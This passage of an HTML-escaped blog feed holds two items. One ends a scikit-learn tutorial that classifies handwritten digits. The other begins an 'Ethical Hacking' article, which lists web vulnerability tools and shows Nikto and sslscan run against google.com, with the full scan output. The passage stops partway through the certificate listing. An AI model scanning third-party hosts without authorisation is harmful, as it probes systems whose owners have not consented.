&lt;span class="n"&gt;plt&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;axis&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;off&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;plt&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;show&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/output1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/output1.png" width="800" height="400"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We will train a simple neural network to recognize numbers in these images. This network will take 1D arrays of 8x8=64 values as input. So we need to convert our 2D images into 1D arrays&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;digits&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;images&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;reshape&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;digits&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;images&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;x contient toutes les images en version 1D&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;[ 0.  0.  5. 13.  9.  1.  0.  0.  0.  0. 13. 15. 10. 15.  5.  0.  0.  3.
 15.  2.  0. 11.  8.  0.  0.  4. 12.  0.  0.  8.  8.  0.  0.  5.  8.  0.
  0.  9.  8.  0.  0.  4. 11.  0.  1. 12.  7.  0.  0.  2. 14.  5. 10. 12.
  0.  0.  0.  0.  6. 13. 10.  0.  0.  0.]
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The network will act as a function allowing you to go from an array of 64 input values to an output value, its estimate of the figure. Here are the output values&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;y&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;digits&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;target&lt;/span&gt;
&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;digits&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;images&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;1797
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  We will create a relatively simple neural network, with a single layer of 15 neurons.
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;sklearn.neural_network&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;MLPClassifier&lt;/span&gt;

&lt;span class="n"&gt;mlp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;MLPClassifier&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hidden_layer_sizes&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;15&lt;/span&gt;&lt;span class="p"&gt;,))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We will train this network on the first 1000 images of our sample, and reserve the following images to test the performance of the network&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;x_train&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="mi"&gt;1000&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="n"&gt;y_train&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;y&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="mi"&gt;1000&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="n"&gt;x_test&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1000&lt;/span&gt;&lt;span class="p"&gt;:]&lt;/span&gt;
&lt;span class="n"&gt;y_test&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;y&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1000&lt;/span&gt;&lt;span class="p"&gt;:]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;mlp&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;fit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;x_train&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;y_train&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/home/samglish/.local/lib/python3.9/site-packages/sklearn/neural_network/_multilayer_perceptron.py:691: ConvergenceWarning: Stochastic Optimizer: Maximum iterations (200) reached and the optimization hasn't converged yet.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And There you go ! we can now look at what the network gives for the following images, which were not seen by the network during training&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;mlp&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;predict&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;x_test&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;array([1, 4, 0, 5, 3, 6, 9, 6, 1, 7])
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;y_test&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;array([1, 4, 0, 5, 3, 6, 9, 6, 1, 7])
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For the first 10 test images, the estimates are excellent!&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;y_pred&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;mlp&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;predict&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;x_test&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then search for the images for which the network made a mistake&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;error&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;y_pred&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;y_test&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Here is the calculation of the error rate&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;numpy&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;np&lt;/span&gt;
&lt;span class="n"&gt;np&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;sum&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;y_test&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;0.09535759096612297
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We can finally select the bad predictions to display them&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;x_error&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x_test&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;error&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nf"&gt;reshape&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;8&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;8&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;span class="n"&gt;y_error&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;y_test&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;error&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="n"&gt;y_pred_error&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;y_pred&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;error&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
&lt;span class="n"&gt;plt&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;imshow&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;x_error&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="n"&gt;cmap&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;binary&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;plt&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;title&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;cible: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;y_error&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;, prediction: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;y_pred_error&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;plt&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;axis&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;off&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;plt&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;show&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/output.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/output.png" width="800" height="400"&gt;&lt;/a&gt;&lt;br&gt;
As we can see, it is difficult to classify these images, even for a human&lt;br&gt;
For better performance, higher resolution images and a more complex neural network, such as a convolutional network, should be used.&lt;/p&gt;

</description>
      <category>datascience</category>
      <category>scikitlearn</category>
      <category>neuralnetwork</category>
      <category>machinelearning</category>
    </item>
    <item>
      <title>Ethical Hacking - This article is about discovering vulnerabilities in web applications.</title>
      <dc:creator>BEIDI DINA SAMUEL</dc:creator>
      <pubDate>Mon, 09 Sep 2024 14:55:56 +0000</pubDate>
      <link>https://forem.com/samglish/ethical-hacking-this-article-is-about-discovering-vulnerabilities-in-web-applications-3no5</link>
      <guid>https://forem.com/samglish/ethical-hacking-this-article-is-about-discovering-vulnerabilities-in-web-applications-3no5</guid>
      <description>&lt;h2&gt;
  
  
  We will use a range of tools to discover application failures.
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Github :&lt;/strong&gt; &lt;a href="https://github.com/samglish/web_exploitation_scanning" rel="noopener noreferrer"&gt;https://github.com/samglish/web_exploitation_scanning&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Example of tools that we will use.
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;&lt;code&gt;Nikto&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Sslscan&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Sslyze&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;OWASP Zed Attack Proxy(&lt;code&gt;ZAP&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;BurpSuite&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Sqlmap&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;bare hand analysis - &amp;gt; &lt;code&gt;CSRF&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Scripting - &amp;gt; &lt;code&gt;Python&lt;/code&gt; - &amp;gt; validation of command injections (&lt;code&gt;HTTP&lt;/code&gt;,&lt;code&gt;ICMP&lt;/code&gt;)&lt;/li&gt;
&lt;/ol&gt;

&lt;h1&gt;
  
  
  1. Nikto
&lt;/h1&gt;

&lt;p&gt;Terminal&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nikto &lt;span class="nt"&gt;-host&lt;/span&gt; google.com &lt;span class="nt"&gt;-port&lt;/span&gt; 443 &lt;span class="nt"&gt;-ssl&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;OUTPUT&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;- Nikto v2.1.6
&lt;span class="nt"&gt;---------------------------------------------------------------------------&lt;/span&gt;
+ Target IP:          142.251.135.110
+ Target Hostname:    google.com
+ Target Port:        443
&lt;span class="nt"&gt;---------------------------------------------------------------------------&lt;/span&gt;
+ SSL Info:        Subject:  /CN&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;.google.com
                   Ciphers:  TLS_AES_256_GCM_SHA384
                   Issuer:   /C&lt;span class="o"&gt;=&lt;/span&gt;US/O&lt;span class="o"&gt;=&lt;/span&gt;Google Trust Services/CN&lt;span class="o"&gt;=&lt;/span&gt;WR2
+ Start Time:         2024-09-09 14:01:05 &lt;span class="o"&gt;(&lt;/span&gt;GMT1&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="nt"&gt;---------------------------------------------------------------------------&lt;/span&gt;
+ Server: gws
+ X-XSS-Protection header has been &lt;span class="nb"&gt;set &lt;/span&gt;to disable XSS Protection. There is unlikely to be a good reason &lt;span class="k"&gt;for &lt;/span&gt;this.
+ Uncommon header &lt;span class="s1"&gt;'alt-svc'&lt;/span&gt; found, with contents: &lt;span class="nv"&gt;h3&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;":443"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nv"&gt;ma&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;2592000,h3-29&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;":443"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nv"&gt;ma&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;2592000
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site &lt;span class="k"&gt;in &lt;/span&gt;a different fashion to the MIME &lt;span class="nb"&gt;type&lt;/span&gt;
+ Root page / redirects to: https://www.google.com/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h1&gt;
  
  
  2. Sslscan
&lt;/h1&gt;

&lt;p&gt;Terminal&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;sslscan google.com
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;OUTPUT&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;Version: 2.0.10-static
OpenSSL 1.1.1l-dev  xx XXX xxxx

Connected to 142.251.135.110

Testing SSL server google.com on port 443 using SNI name google.com

  SSL/TLS Protocols:
SSLv2     disabled
SSLv3     disabled
TLSv1.0   enabled
TLSv1.1   enabled
TLSv1.2   enabled
TLSv1.3   enabled

  TLS Fallback SCSV:
Server supports TLS Fallback SCSV

  TLS renegotiation:
Secure session renegotiation supported

  TLS Compression:
Compression disabled

  Heartbleed:
TLSv1.3 not vulnerable to heartbleed
TLSv1.2 not vulnerable to heartbleed
TLSv1.1 not vulnerable to heartbleed
TLSv1.0 not vulnerable to heartbleed

  Supported Server Cipher&lt;span class="o"&gt;(&lt;/span&gt;s&lt;span class="o"&gt;)&lt;/span&gt;:
Preferred TLSv1.3  128 bits  TLS_AES_128_GCM_SHA256        Curve 25519 DHE 253
Accepted  TLSv1.3  256 bits  TLS_AES_256_GCM_SHA384        Curve 25519 DHE 253
Accepted  TLSv1.3  256 bits  TLS_CHACHA20_POLY1305_SHA256  Curve 25519 DHE 253
Preferred TLSv1.2  256 bits  ECDHE-ECDSA-CHACHA20-POLY1305 Curve 25519 DHE 253
Accepted  TLSv1.2  128 bits  ECDHE-ECDSA-AES128-GCM-SHA256 Curve 25519 DHE 253
Accepted  TLSv1.2  256 bits  ECDHE-ECDSA-AES256-GCM-SHA384 Curve 25519 DHE 253
Accepted  TLSv1.2  128 bits  ECDHE-ECDSA-AES128-SHA        Curve 25519 DHE 253
Accepted  TLSv1.2  256 bits  ECDHE-ECDSA-AES256-SHA        Curve 25519 DHE 253
Accepted  TLSv1.2  256 bits  ECDHE-RSA-CHACHA20-POLY1305   Curve 25519 DHE 253
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256   Curve 25519 DHE 253
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve 25519 DHE 253
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA          Curve 25519 DHE 253
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA          Curve 25519 DHE 253
Accepted  TLSv1.2  128 bits  AES128-GCM-SHA256            
Accepted  TLSv1.2  256 bits  AES256-GCM-SHA384            
Accepted  TLSv1.2  128 bits  AES128-SHA                   
Accepted  TLSv1.2  256 bits  AES256-SHA                   
Accepted  TLSv1.2  112 bits  DES-CBC3-SHA                 
Preferred TLSv1.1  128 bits  ECDHE-ECDSA-AES128-SHA        Curve 25519 DHE 253
Accepted  TLSv1.1  256 bits  ECDHE-ECDSA-AES256-SHA        Curve 25519 DHE 253
Accepted  TLSv1.1  128 bits  ECDHE-RSA-AES128-SHA          Curve 25519 DHE 253
Accepted  TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve 25519 DHE 253
Accepted  TLSv1.1  128 bits  AES128-SHA                   
Accepted  TLSv1.1  256 bits  AES256-SHA                   
Accepted  TLSv1.1  112 bits  DES-CBC3-SHA                 
Preferred TLSv1.0  128 bits  ECDHE-ECDSA-AES128-SHA        Curve 25519 DHE 253
Accepted  TLSv1.0  256 bits  ECDHE-ECDSA-AES256-SHA        Curve 25519 DHE 253
Accepted  TLSv1.0  128 bits  ECDHE-RSA-AES128-SHA          Curve 25519 DHE 253
Accepted  TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve 25519 DHE 253
Accepted  TLSv1.0  128 bits  AES128-SHA                   
Accepted  TLSv1.0  256 bits  AES256-SHA                   
Accepted  TLSv1.0  112 bits  DES-CBC3-SHA                 

  Server Key Exchange Group&lt;span class="o"&gt;(&lt;/span&gt;s&lt;span class="o"&gt;)&lt;/span&gt;:
TLSv1.3  128 bits  secp256r1 &lt;span class="o"&gt;(&lt;/span&gt;NIST P-256&lt;span class="o"&gt;)&lt;/span&gt;
TLSv1.3  128 bits  x25519
TLSv1.2  128 bits  secp256r1 &lt;span class="o"&gt;(&lt;/span&gt;NIST P-256&lt;span class="o"&gt;)&lt;/span&gt;
TLSv1.2  128 bits  x25519

  SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
ECC Curve Name:      prime256v1
ECC Key Strength:    128

Subject:  &lt;span class="k"&gt;*&lt;/span&gt;.google.com
Altnames: DNS:&lt;span class="k"&gt;*&lt;/span&gt;.google.com, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.appengine.google.com, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.bdn.dev, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.origin-test.bdn.dev, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.cloud.google.com, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.crowdsource.google.com, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.datacompute.google.com, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.google.ca, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.google.cl, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.google.co.in, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.google.co.jp, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.google.co.uk, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.google.com.ar, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.google.com.au, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.google.com.br, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.google.com.co, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.google.com.mx, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.google.com.tr, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.google.com.vn, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.google.de, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.google.es, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.google.fr, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.google.hu, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.google.it, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.google.nl, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.google.pl, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.google.pt, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.googleapis.cn, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.googlevideo.com, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.gstatic.cn, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.gstatic-cn.com, DNS:googlecnapps.cn, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.googlecnapps.cn, DNS:googleapps-cn.com, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.googleapps-cn.com, DNS:gkecnapps.cn, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.gkecnapps.cn, DNS:googledownloads.cn, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.googledownloads.cn, DNS:recaptcha.net.cn, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.recaptcha.net.cn, DNS:recaptcha-cn.net, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.recaptcha-cn.net, DNS:widevine.cn, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.widevine.cn, DNS:ampproject.org.cn, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.ampproject.org.cn, DNS:ampproject.net.cn, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.ampproject.net.cn, DNS:google-analytics-cn.com, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.google-analytics-cn.com, DNS:googleadservices-cn.com, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.googleadservices-cn.com, DNS:googlevads-cn.com, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.googlevads-cn.com, DNS:googleapis-cn.com, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.googleapis-cn.com, DNS:googleoptimize-cn.com, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.googleoptimize-cn.com, DNS:doubleclick-cn.net, DNS:&lt;span class="k"&gt;*&lt;/span&gt;.doubleclick-cn.net, 